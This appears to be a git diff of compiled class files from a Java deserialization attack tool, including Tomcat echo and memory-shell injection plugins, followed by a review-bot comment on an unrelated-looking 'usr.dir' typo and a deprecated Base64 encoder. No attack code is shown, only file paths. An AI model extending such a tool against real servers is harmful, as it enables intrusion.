diff --git a/target/classes/com/summersec/attack/deser/echo/TomcatEcho.class b/target/classes/com/summersec/attack/deser/echo/TomcatEcho.class
index 84f7f19..c69dd07 100644
Binary files a/target/classes/com/summersec/attack/deser/echo/TomcatEcho.class and b/target/classes/com/summersec/attack/deser/echo/TomcatEcho.class differ
diff --git a/target/classes/com/summersec/attack/deser/plugins/InjectMemTool.class b/target/classes/com/summersec/attack/deser/plugins/InjectMemTool.class
index b6a80d0..adac6a6 100644
Binary files a/target/classes/com/summersec/attack/deser/plugins/InjectMemTool.class and b/target/classes/com/summersec/attack/deser/plugins/InjectMemTool.class differ
diff --git a/target/classes/com/summersec/attack/deser/util/StandardExecutorClassLoader.class b/target/classes/com/summersec/attack/deser/util/StandardExecutorClassLoader.class
index 19dcfbb..5c5fad3 100644
Binary files a/target/classes/com/summersec/attack/deser/util/StandardExecutorClassLoader.class and b/target/classes/com/summersec/attack/deser/util/StandardExecutorClassLoader.class differ
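Review bot: `System.getProperty("usr.dir")` prints `null` because the standard property is `user.dir`. `sun.misc.BASE64Encoder` is a JDK-internal class that is no longer accessible on JDK 9+, and `base64Encoder` is constructed and never used; the commented line already names the replacement, `java.util.Base64.getEncoder()`, so switch to it and drop the import and the three commented-out calls.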